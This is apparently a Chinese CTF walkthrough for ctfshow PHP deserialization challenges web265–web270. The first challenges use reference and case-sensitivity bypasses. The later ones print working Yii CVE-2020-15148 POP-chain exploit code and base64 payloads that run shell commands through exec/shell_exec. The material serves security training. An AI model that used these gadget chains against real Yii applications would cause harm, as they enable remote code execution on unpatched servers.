目录
1、web265
2、web266
3、web267
4、web268
5、web269
6、web270
1、web265
很简单的一个判断,满足 $this->token===$this->password; 即可
由于 $ctfshow->token=md5(mt_rand()) 会将 token 随机为一个 md5 值,我们使用 & 绕一下,让两个参数恒等
exp:
<?php
class ctfshowAdmin
{public $token;public $password;public function __construct($t, $p){$this->token = $t;$this->password = $p;}
}$c = new ctfshowAdmin(1,2);
$c->token = &$c->password;
echo serialize($c);
?>
payload:
?ctfshow=O:12:"ctfshowAdmin":2:{s:5:"token";i:2;s:8:"password";R:2;}
拿到 flag:ctfshow{11cbda99-2f50-42bb-89f9-d9b08318d448}
2、web266
__destruct() 在对象被销毁时会自动调用,我们只需要让 ctfshow 类正确被反序列化即可,但是直接传 ctfshow 会被检测,之后就会抛出异常,如果程序报错或者抛出异常就不会触发 __destruct() 了,因为 throw 那个函数回收了自动销毁的类,导致 __destruct() 检测不到有东西销毁,从而也就无法触发 __destruct()。
这里正则匹配大小写敏感,因此可以采用大小写绕过
exp:
<?php
class Ctfshow
{public $username = 'xxxxxx';public $password = 'xxxxxx';
}
$c = new Ctfshow();
echo serialize($c);
payload:
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
bp 重放或者 raw 模式下使用 hackbar,不然可能没回显
拿到 flag:ctfshow{cd17da6b-75f5-4cfc-b792-39bb72724740}
当然我们可以强行先触发它的 GC 回收来抛出异常,唤醒 __destruct() 魔术方法
触发方式有两种:对象被 unset() 处理时;数组对象为 NULL 时
这里采用第二种方式
exp:
<?phpclass ctfshow
{public $username = 'xxxxxx';public $password = 'xxxxxx';
}
$c = new ctfshow();
$m = array($c,0);
echo serialize($m);
payload:
a:2:{i:0;O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}i:1;i:0;}
3、web267
admin/admin 可以登录
提示 get 请求 view-source
///backdoor/shell
unserialize(base64_decode($_GET['code']))
Yii 的一个 CVE:CVE-2020-15148
用现成的 poc 打:
<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'exec'; $this->id = 'cat /f* > my6n.txt';}}
}
namespace Faker {use yii\rest\IndexAction;class Generator{protected $formatters;public function __construct(){$this->formatters['close'] = [new IndexAction(), 'run'];}}
}
namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new Generator();}}
}
namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjE4OiJjYXQgL2YqID4gbXk2bi50eHQiO31pOjE7czozOiJydW4iO319fX0
访问 my6n.txt 即可看到 flag
4、web268
上一题的 poc 打不通了,换一个
<?php
namespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this->checkAccess = $func;$this->id = $param;}}
}
namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];}}
}
namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this->_dataReader = new \yii\web\DbSession($func, $param);}}
}
namespace {$exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* my6n.txt');echo(base64_encode(serialize($exp)));
}
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0
拿到 flag:ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}
5、web269
同上,payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0
6、web270
payload:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0